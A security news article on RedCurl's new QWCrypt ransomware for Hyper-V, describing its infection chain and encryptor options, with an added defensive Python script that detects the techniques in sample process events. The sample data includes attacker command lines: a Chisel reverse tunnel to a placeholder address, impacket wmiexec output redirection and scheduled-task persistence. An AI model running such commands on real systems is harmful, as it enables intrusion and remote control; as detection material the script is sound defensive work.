RedCurl, a cyberespionage group active since 2018, has expanded its operations to include ransomware attacks targeting Hyper-V virtual machines. This marks a significant shift for the group, previously known for its stealthy data exfiltration campaigns against corporate entities worldwide.
The newly discovered ransomware, dubbed QWCrypt, is specifically designed to encrypt virtual machines hosted on Microsoft’s Hyper-V platform. Ransomware that targets hypervisors has overwhelmingly focused on VMware ESXi, so a Hyper-V-specific encryptor is unusual. Bitdefender Labs researchers, who uncovered the ransomware, noted a change in RedCurl’s tactics.
“We’ve seen RedCurl stick to their usual playbook in most cases, continuing with data exfiltration over longer periods of time,” their report states. “However, one case stood out. They broke their routine and deployed ransomware for the first time.”
QWCrypt’s infection chain begins with phishing emails carrying .IMG files disguised as resumes. Opening an .IMG mounts it as a new drive, from which the victim launches a screensaver (.scr) file. That file is a legitimate Adobe executable vulnerable to DLL sideloading: it loads a malicious DLL placed beside it, which downloads the main payload and establishes persistence through a scheduled task.
RedCurl employs “living-off-the-land” binaries to maintain a low profile on compromised systems. A custom wmiexec variant handles lateral movement within the network while evading security tools. Chisel tunnels traffic, giving the operators RDP access for remote control. Tooling is staged in encrypted 7z archives, and a multi-stage PowerShell process disables security defenses before the ransomware is deployed.
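The chain described in the two paragraphs above (an .scr launched from a mounted image, a scheduled task for persistence, wmiexec-style lateral movement, a Chisel reverse tunnel) is what an analyst would hunt for in process-creation telemetry. The following is an added example, not code from Bitdefender or from the RedCurl tooling: it runs a few heuristic rules over constructed, Sysmon-like events. The log format, the paths, the task name, the 203.0.113.10 address and the rule names are all assumptions for the example. The wmiexec rule matches the default output redirection of the public impacket wmiexec.py; the custom variant the report mentions may not use that exact pattern.

```python
import re

# Constructed sample process-creation events in a simplified "Key=Value|Key=Value" form
# (loosely modelled on Sysmon Event ID 1 fields). These are NOT real RedCurl telemetry;
# paths, task names and the 203.0.113.10 address are made up for the example.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\explorer.exe|ParentImage=C:\\Windows\\System32\\userinit.exe|CommandLine=explorer.exe",
    # .scr launched by the user from a freshly mounted image (drive E:)
    "Image=E:\\Resume_2025.scr|ParentImage=C:\\Windows\\explorer.exe|CommandLine=\"E:\\Resume_2025.scr\"",
    # persistence: the .scr process creates a scheduled task
    "Image=C:\\Windows\\System32\\schtasks.exe|ParentImage=E:\\Resume_2025.scr|CommandLine=schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\Users\\Public\\svc.exe",
    # impacket-style wmiexec: WmiPrvSE spawns cmd.exe and redirects output into ADMIN$
    "Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\System32\\wbem\\WmiPrvSE.exe|CommandLine=cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1711 2>&1",
    # chisel reverse tunnel exposing RDP (3389) to the operator's server
    "Image=C:\\Users\\Public\\chisel.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=chisel.exe client 203.0.113.10:8080 R:3389:127.0.0.1:3389",
    # benign: the real screensaver started by winlogon from System32
    "Image=C:\\Windows\\System32\\scrnsave.scr|ParentImage=C:\\Windows\\System32\\winlogon.exe|CommandLine=scrnsave.scr /s",
]

# '1> \\127.0.0.1\ADMIN$\__<timestamp>' is impacket wmiexec's default output capture.
WMIEXEC_RE = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.IGNORECASE)
# chisel reverse-tunnel syntax: 'client <server> R:<port>:... ' or 'R:socks'
CHISEL_RE = re.compile(r"\bclient\b.*\bR:(?:\d+|socks)", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Split one 'Key=Value|Key=Value' line into a dict (first '=' separates key from value)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def classify(ev: dict) -> list:
    """Return the names of every heuristic rule the event matches."""
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    # A screensaver binary running from anywhere but the Windows directory matches the
    # renamed-executable trick: an .scr launched from a mounted IMG.
    if image.endswith(".scr") and not image.startswith("c:\\windows\\"):
        hits.append("scr_outside_windows")
    # Persistence: schtasks /create spawned directly by that screensaver process.
    if parent.endswith(".scr") and image.endswith("\\schtasks.exe") and "/create" in cmd.lower():
        hits.append("schtasks_from_scr")
    # Lateral movement: WmiPrvSE.exe spawning cmd.exe with output redirected into ADMIN$.
    if parent.endswith("\\wmiprvse.exe") and image.endswith("\\cmd.exe") and WMIEXEC_RE.search(cmd):
        hits.append("wmiexec_pattern")
    # Tunnelling: a chisel binary by name, or the 'client ... R:<port|socks>' syntax under any name.
    if "chisel" in image or CHISEL_RE.search(cmd):
        hits.append("chisel_reverse_tunnel")
    return hits


def scan(lines) -> dict:
    """Return {line_index: [rule, ...]} for every event that matched at least one rule."""
    findings = {}
    for i, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits)
```

The rules are deliberately narrow (parent/child pairs plus a command-line pattern) so that the legitimate screensaver started by winlogon from System32 does not fire; in a real deployment the "chisel" name match is the weakest signal, since the binary is trivially renamed, and the `R:` reverse-tunnel syntax is the part worth keeping.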
QWCrypt offers several command-line arguments to customize attacks, including options to exclude specific VMs (--excludeVM), encrypt Hyper-V VMs (--hv), kill VM processes (--kill), and turn off Hyper-V VMs (--turnoff). In observed attacks, RedCurl used the --excludeVM argument to avoid disrupting network gateways.
The ransomware uses the XChaCha20-Poly1305 encryption algorithm and appends either the .locked$ or .randombits$ extension to encrypted files. To speed up the process it supports intermittent encryption (block skipping, so only part of each file is encrypted) and selects which files to encrypt based on their size. The ransom note, “!!!how_to_unlock_randombits_files.txt$”, borrows text from LockBit, HardBit, and Mimic ransom notes.
The absence of a dedicated leak site suggests the ransomware’s purpose might be a distraction, a fallback for failed data extortion services, or a genuine attempt at financial gain through private negotiations.
“The RedCurl group’s recent deployment of ransomware marks a significant evolution in their tactics,” Bitdefender concludes. “This departure from their established modus operandi raises critical questions about their motivations and operational objectives.”
Bitdefender proposes two hypotheses for RedCurl’s shift towards ransomware. The first is that RedCurl operates as a mercenary group, blending espionage with financially motivated attacks. Ransomware could serve as a distraction from data theft or a way to monetize access when clients don’t pay for data collection. The second theory suggests RedCurl engages in ransomware for profit but prefers private negotiations over public leaks.